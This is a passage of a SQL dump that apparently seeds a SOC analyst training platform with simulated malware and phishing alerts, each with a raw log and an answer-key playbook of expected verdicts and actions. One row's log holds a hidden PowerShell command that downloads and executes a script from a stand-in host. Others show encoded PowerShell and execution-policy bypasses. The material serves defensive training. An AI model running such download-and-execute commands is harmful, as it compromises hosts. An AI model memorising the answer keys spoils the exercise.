machine\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"198.51.100.23\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP associated with C2 server activity\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"b52c8f33f2a9e8fbd7e5a7c9a2f4d1e2\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Script identified as malicious PowerShell payload\"}}],\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"PowerShell script execution from macro indicates a sophisticated attack vector.\"}', 'Intermediate', 'MAL', 5, 1, 'FINANCE', NULL, NULL, NULL, 0),
(2225, 'Cuckoo Sandbox Alert: Malicious Macro Execution Attempt', 'medium', 'Cuckoo Sandbox', 'An analysis of a document revealed an embedded macro attempting to execute a suspicious command that downloads a file from an external IP.', 'Malware', 'T1203', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T10:00:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.20\",\"dst_ip\":\"203.0.113.75\",\"username\":\"bwhite\",\"hostname\":\"office-pc-5\",\"command_line\":\"cmd.exe /c powershell -w hidden -c \\\"IEX(New-Object Net.WebClient).DownloadString(\'http://malicious.example.com/script.ps1\')\\\"\",\"file_hash\":\"d4c3b2a1e8f5c6d7b9a8e7f6c5d4b3a2\"}', '2026-03-16 03:25:33', '2026-03-16 03:25:33', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.20\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address of victim machine\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.75\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP known for hosting malicious scripts\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d4c3b2a1e8f5c6d7b9a8e7f6c5d4b3a2\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Malicious macro script execution detected\"}}],\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The command line execution indicates an attempt to download and execute a malicious script.\"}', 'Intermediate', 'MAL', 5, 1, 'RETAIL', NULL, NULL, NULL, 0),
(2226, 'Any.Run Analysis Flagged Benign Script Execution', 'low', 'Any.Run', 'A scheduled script execution was flagged for unusual activity. Further analysis revealed it to be a legitimate system update process.', 'Malware', 'T1059.004', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T11:00:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.25\",\"dst_ip\":\"203.0.113.80\",\"username\":\"csysadmin\",\"hostname\":\"server01\",\"command_line\":\"C:\\\\Windows\\\\system32\\\\update.exe /auto\"}', '2026-03-16 03:25:33', '2026-03-16 03:25:33', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address of server\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.80\",\"is_critical\":false,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"clean\",\"details\":\"IP associated with legitimate update server\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"C:\\\\Windows\\\\system32\\\\update.exe /auto\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Recognized as a legitimate system update command\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The script was part of a routine system update process and posed no threat.\"}', 'Intermediate', 'MAL', 5, 1, 'GOVERNMENT', NULL, NULL, NULL, 0),
(2227, 'Ghidra Analysis of Suspicious Script Reveals Benign Activity', 'low', 'Ghidra', 'A script flagged for potentially malicious behavior was analyzed and found to be a part of an automated backup task.', 'Malware', 'T1086', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T12:30:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"10.0.0.5\",\"dst_ip\":\"203.0.113.90\",\"username\":\"backupuser\",\"hostname\":\"backup-server\",\"command_line\":\"backupscript.sh --run\"}', '2026-03-16 03:25:33', '2026-03-16 03:25:33', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.5\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address of backup server\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.90\",\"is_critical\":false,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"clean\",\"details\":\"Backup destination IP is clean\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"backupscript.sh --run\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Recognized as part of a scheduled backup process\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The script execution is part of a scheduled backup task and is non-malicious.\"}', 'Intermediate', 'MAL', 5, 1, 'OT_ICS', NULL, NULL, NULL, 0),
(2228, 'Suspicious Packed Executable Detected', 'high', 'Cuckoo Sandbox', 'A packed executable with a known malicious hash was detected on an internal machine. Reverse engineering tools have flagged the binary for further analysis.', 'Malware', 'T1027', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T08:45:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.25\",\"dst_ip\":null,\"username\":\"jdoe\",\"hostname\":\"INTERNAL-PC-01\",\"command_line\":\"C:\\\\Temp\\\\malicious_packed_exe.exe\",\"file_hash\":\"c0ffeeaddbabe123456789abcdef123456789abc\"}', '2026-03-16 03:25:33', '2026-03-16 03:25:33', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"This is an internal IP address.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"c0ffeeaddbabe123456789abcdef123456789abc\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with multiple malware campaigns.\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"C:\\\\Temp\\\\malicious_packed_exe.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Executable flagged for suspicious behavior.\"}}],\"expected_actions\":[\"block_hash\",\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The hash is confirmed malicious, correlating with known malware signatures.\"}', 'Intermediate', 'MAL', 5, 1, 'TECH', NULL, NULL, NULL, 0),
(2229, 'Malicious Macro Detected in Email Attachment', 'critical', 'Ghidra', 'A malicious macro embedded in a Word document was detected. The macro is designed to download and execute further payloads.', 'Malware', 'T1203', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T07:30:00Z\",\"event_type\":\"email_received\",\"src_ip\":\"203.0.113.45\",\"dst_ip\":\"192.168.1.42\",\"username\":\"asmith\",\"hostname\":\"INTERNAL-PC-02\",\"email_sender\":\"attacker@example.com\",\"file_hash\":\"deadbeef1234567890abcdef1234567890abcdef\"}', '2026-03-16 03:25:33', '2026-03-16 03:25:33', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 847 times for suspicious activity.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"deadbeef1234567890abcdef1234567890abcdef\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash identified in multiple malicious macro analysis reports.\"}},{\"id\":\"artifact_3\",\"type\":\"email\",\"value\":\"attacker@example.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"Email address linked to phishing campaigns.\"}},{\"id\":\"artifact_4\",\"type\":\"ip\",\"value\":\"192.168.1.42\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"This is an internal IP address.\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"isolate_host\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The macro\'s behavior and associated hash confirm malicious intent.\"}', 'Intermediate', 'MAL', 5, 1, 'FINANCE', NULL, NULL, NULL, 0),
(2230, 'Suspicious Network Activity from Internal Host', 'medium', 'Any.Run', 'Unusual network traffic from an internal host was observed communicating with a known C2 server.', 'Lateral Movement', 'T1071', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T06:15:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.1.50\",\"dst_ip\":\"203.0.113.155\",\"username\":\"bthomas\",\"hostname\":\"INTERNAL-SRV-01\",\"domain\":\"malicious-c2.example.com\"}', '2026-03-16 03:25:33', '2026-03-16 03:25:33', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.50\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"This is an internal IP address.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.155\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP known to be a command and control server.\"}},{\"id\":\"artifact_3\",\"type\":\"domain\",\"value\":\"malicious-c2.example.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"Domain associated with malware distribution.\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"The destination IP and domain are linked to known C2 infrastructure.\"}', 'Intermediate', 'MAL', 5, 1, 'ENERGY', NULL, NULL, NULL, 0),
(2231, 'Benign Code Execution Flagged by Reverse Engineering Tool', 'low', 'IDA Pro', 'An internal script execution was mistakenly flagged due to a false signature match. No malicious activity was detected.', 'Malware', 'T1059', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T05:00:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.75\",\"dst_ip\":null,\"username\":\"mwhite\",\"hostname\":\"INTERNAL-LAPTOP-01\",\"command_line\":\"C:\\\\Scripts\\\\routine_task.exe\",\"file_hash\":\"beefcafe1234567890abcdef1234567890abcdef\"}', '2026-03-16 03:25:33', '2026-03-16 03:25:33', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.75\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"This is an internal IP address.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"beefcafe1234567890abcdef1234567890abcdef\",\"is_critical\":false,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"clean\",\"details\":\"Hash not associated with any known malicious activity.\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"C:\\\\Scripts\\\\routine_task.exe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"clean\",\"details\":\"Executable identified as routine internal task.\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The alert was triggered by a false signature match; no threat found.\"}', 'Intermediate', 'MAL', 5, 1, 'GOVERNMENT', NULL, NULL, NULL, 0),
(2232, 'False Positive: Internal Script Misidentified as Threat', 'low', 'Any.Run', 'A routine script execution within the network was flagged as suspicious due to heuristic analysis, but no malicious intent was identified upon review.', 'Malware', 'T1059', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T04:30:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.90\",\"dst_ip\":null,\"username\":\"klee\",\"hostname\":\"INTERNAL-WORKSTATION-03\",\"command_line\":\"C:\\\\Utilities\\\\internal_tool.exe\",\"file_hash\":\"cafebabe1234567890abcdef1234567890abcdef\"}', '2026-03-16 03:25:33', '2026-03-16 03:25:33', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.90\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"This is an internal IP address.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"cafebabe1234567890abcdef1234567890abcdef\",\"is_critical\":false,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"clean\",\"details\":\"Hash not associated with any known malicious activity.\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"C:\\\\Utilities\\\\internal_tool.exe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"clean\",\"details\":\"Executable verified as a legitimate internal tool.\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The execution was part of normal operations, misflagged by heuristics.\"}', 'Intermediate', 'MAL', 5, 1, 'HEALTHCARE', NULL, NULL, NULL, 0),
(2233, 'Packed Executable Detected via Reverse Engineering', 'high', 'IDA Pro', 'A packed executable was deobfuscated using reverse engineering tools, revealing malicious code meant for data exfiltration.', 'Malware', 'T1027', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T09:45:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.101\",\"dst_ip\":\"\",\"username\":\"jdoe\",\"hostname\":\"workstation-01\",\"command_line\":\"/usr/bin/ida_pro /malware/suspicious_file.exe\",\"file_hash\":\"7d2f8d8c9a1b0c9eb0f5e7e8f2d2f5b9\"}', '2026-03-16 03:25:33', '2026-03-16 03:25:33', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.101\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"7d2f8d8c9a1b0c9eb0f5e7e8f2d2f5b9\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Identified as a Trojan with data exfiltration capabilities\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"/usr/bin/ida_pro /malware/suspicious_file.exe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"suspicious\",\"details\":\"Execution of potentially malicious executable\"}}],\"expected_actions\":[\"block_hash\",\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The unpacked executable reveals known malicious patterns linked to data exfiltration.\"}', 'Intermediate', 'MAL', 5, 1, 'TECH', NULL, NULL, NULL, 0),
(2234, 'Malicious Macro Executed in Document', 'critical', 'Ghidra', 'A document containing macros was reverse engineered, revealing a PowerShell script designed to download additional payloads from a C2 server.', 'Malware', 'T1059.001', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T11:20:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"203.0.113.85\",\"dst_ip\":\"192.168.1.150\",\"username\":\"asmith\",\"hostname\":\"laptop-02\",\"command_line\":\"powershell.exe -EncodedCommand aQBlAHgAQQBNAHAAbABlAC4AZABvAGMALgB4AHgAcwBzAA==\",\"file_hash\":\"b9f1a9d8c2d5f7e8f1d2f3b9e8f7b2c3\"}', '2026-03-16 03:25:33', '2026-03-16 03:25:33', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.85\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported several times for hosting malicious scripts\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"b9f1a9d8c2d5f7e8f1d2f3b9e8f7b2c3\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Macro document with embedded PowerShell script\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"powershell.exe -EncodedCommand aQBlAHgAQQBNAHAAbABlAC4AZABvAGMALgB4AHgAcwBzAA==\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"suspicious\",\"details\":\"Encoded PowerShell command execution\"}}],\"expected_actions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The PowerShell script was part of a macro designed to download additional malicious payloads.\"}', 'Intermediate', 'MAL', 5, 1, 'FINANCE', NULL, NULL, NULL, 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(2235, 'Suspicious Network Traffic Identified', 'medium', 'Any.Run', 'Unusual traffic patterns from an internal IP were analyzed but revealed no malicious activity upon further investigation.', 'Data Exfil', 'T1041', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T13:30:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.1.105\",\"dst_ip\":\"198.51.100.10\",\"username\":\"mwhite\",\"hostname\":\"workstation-03\",\"file_hash\":\"d4f3b8c9e2a9b1c0d1e7f8b9c2a1f5d8\"}', '2026-03-16 03:25:33', '2026-03-16 03:25:33', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.105\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"198.51.100.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"clean\",\"details\":\"No malicious activity detected for this destination IP\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"Despite initial suspicion, the network traffic analysis showed no signs of data exfiltration.\"}', 'Intermediate', 'MAL', 5, 1, 'HEALTHCARE', NULL, NULL, NULL, 0),
(2236, 'Macro-based Phishing Document Identified', 'medium', 'Cuckoo Sandbox', 'A document received via email with suspicious macros was analyzed but determined to be benign upon further inspection.', 'Phishing', 'T1204', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T08:00:00Z\",\"event_type\":\"email_received\",\"src_ip\":\"203.0.113.55\",\"dst_ip\":\"192.168.1.110\",\"username\":\"jwright\",\"hostname\":\"laptop-04\",\"email_sender\":\"unknown@maliciousdomain.com\",\"file_hash\":\"a2b0f9d8c2d1f7e9f1b2c3e4d5f6a7b8\"}', '2026-03-16 03:25:33', '2026-03-16 03:25:33', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.110\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}},{\"id\":\"artifact_2\",\"type\":\"email\",\"value\":\"unknown@maliciousdomain.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"suspicious\",\"details\":\"Domain registered recently with no known malicious activity\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"a2b0f9d8c2d1f7e9f1b2c3e4d5f6a7b8\",\"is_critical\":false,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"clean\",\"details\":\"No malicious activity detected in the file\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"The document contained macros, but they were found to be non-malicious after detailed analysis.\"}', 'Intermediate', 'MAL', 5, 1, 'GOVERNMENT', NULL, NULL, NULL, 0),
(2237, 'Reverse Engineering Reveals Malicious Macro', 'critical', 'Ghidra', 'A suspicious document analyzed with reverse engineering tools revealed a macro containing a Base64 encoded PowerShell script for credential dumping.', 'Malware', 'T1059.001', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T10:15:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.2.150\",\"dst_ip\":\"\",\"username\":\"tgreen\",\"hostname\":\"finance-laptop\",\"command_line\":\"powershell.exe -EncodedCommand Y3JlZGVudGlhbHMuZHVtcA==\",\"file_hash\":\"e1f2a3d4c5b6f7e8d9c0b1a2e3f4d5c6\"}', '2026-03-16 03:25:33', '2026-03-16 03:25:33', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.2.150\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"e1f2a3d4c5b6f7e8d9c0b1a2e3f4d5c6\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Document containing macros linked to credential dumping\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"powershell.exe -EncodedCommand Y3JlZGVudGlhbHMuZHVtcA==\",\"is_critical\":false,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"suspicious\",\"details\":\"Encoded PowerShell command for potential credential dumping\"}}],\"expected_actions\":[\"isolate_host\",\"block_hash\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The reverse-engineered document contained a malicious macro designed for credential theft.\"}', 'Intermediate', 'MAL', 5, 1, 'FINANCE', NULL, NULL, NULL, 0),
(2238, 'Malware Detected via Packed Executable Analysis', 'high', 'Cuckoo Sandbox', 'A packed executable was analyzed and found to contain malicious code targeting persistence mechanisms. Reverse engineering confirmed the presence of code injection techniques.', 'Malware', 'T1055', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T03:45:23Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.25\",\"dst_ip\":\"203.0.113.5\",\"username\":\"jdoe\",\"hostname\":\"HR-PC\",\"command_line\":\"rundll32.exe shell32.dll,ShellExec_RunDLL packed_malware.exe\",\"file_hash\":\"a1b2c3d4e5f67890\",\"domain\":\"maliciousdomain.com\"}', '2026-03-16 03:25:33', '2026-03-16 03:25:33', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.5\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 1200 times for malware distribution\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"a1b2c3d4e5f67890\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known malware variants\"}},{\"id\":\"artifact_3\",\"type\":\"domain\",\"value\":\"maliciousdomain.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"Domain used for command and control\"}},{\"id\":\"artifact_4\",\"type\":\"command\",\"value\":\"rundll32.exe shell32.dll,ShellExec_RunDLL packed_malware.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"Command line execution pattern matches malware behavior\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"block_hash\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The packed executable shows typical malware behavior, confirmed by multiple OSINT sources.\"}', 'Intermediate', 'MAL', 5, 1, 'FINANCE', NULL, NULL, NULL, 0),
(2239, 'Suspicious Macro Detected in Office Document', 'medium', 'Any.Run', 'A macro embedded within a Word document attempted to execute a remote script. Analysis indicates potential phishing attempt.', 'Malware', 'T1203', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T08:22:01Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.50\",\"dst_ip\":\"198.51.100.30\",\"username\":\"mwhite\",\"hostname\":\"Finance-Laptop\",\"command_line\":\"powershell.exe -ExecutionPolicy Bypass -File macro.ps1\",\"file_hash\":\"f5e8d9c0b1e23456\",\"email_sender\":\"trusted@company.com\"}', '2026-03-16 03:25:33', '2026-03-16 03:25:33', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.30\",\"is_critical\":false,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"clean\",\"details\":\"IP not associated with malicious activity\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"f5e8d9c0b1e23456\",\"is_critical\":false,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"clean\",\"details\":\"Hash not recognized as malicious\"}},{\"id\":\"artifact_3\",\"type\":\"email\",\"value\":\"trusted@company.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Email domain legitimate and not spoofed\"}},{\"id\":\"artifact_4\",\"type\":\"command\",\"value\":\"powershell.exe -ExecutionPolicy Bypass -File macro.ps1\",\"is_critical\":false,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"suspicious\",\"details\":\"PowerShell script execution observed but not conclusively malicious\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The macro activity matches benign scripts from a trusted sender, indicating a false positive.\"}', 'Intermediate', 'MAL', 5, 1, 'FINANCE', NULL, NULL, NULL, 0),
(2240, 'Malicious Macro Execution in Office Document', 'critical', 'Ghidra', 'An Office document containing a malicious macro was executed, leading to the download and execution of a secondary payload.', 'Malware', 'T1204', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T11:30:45Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.2.15\",\"dst_ip\":\"203.0.113.75\",\"username\":\"ksmith\",\"hostname\":\"Marketing-PC\",\"command_line\":\"winword.exe /m malicious_macro.docm\",\"file_hash\":\"b7a8c9d0e2f33456\",\"url\":\"http://malicious-site.com/payload.exe\"}', '2026-03-16 03:25:33', '2026-03-16 03:25:33', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.75\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP associated with multiple malware distribution activities\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"b7a8c9d0e2f33456\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash identified as a downloader for ransomware\"}},{\"id\":\"artifact_3\",\"type\":\"url\",\"value\":\"http://malicious-site.com/payload.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"URL hosts known malware payloads\"}},{\"id\":\"artifact_4\",\"type\":\"command\",\"value\":\"winword.exe /m malicious_macro.docm\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"Command line behavior associated with macro-based attacks\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"block_hash\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The macro executed a known malicious payload, confirmed by multiple threat intelligence sources.\"}', 'Intermediate', 'MAL', 5, 1, 'TECH', NULL, NULL, NULL, 0),
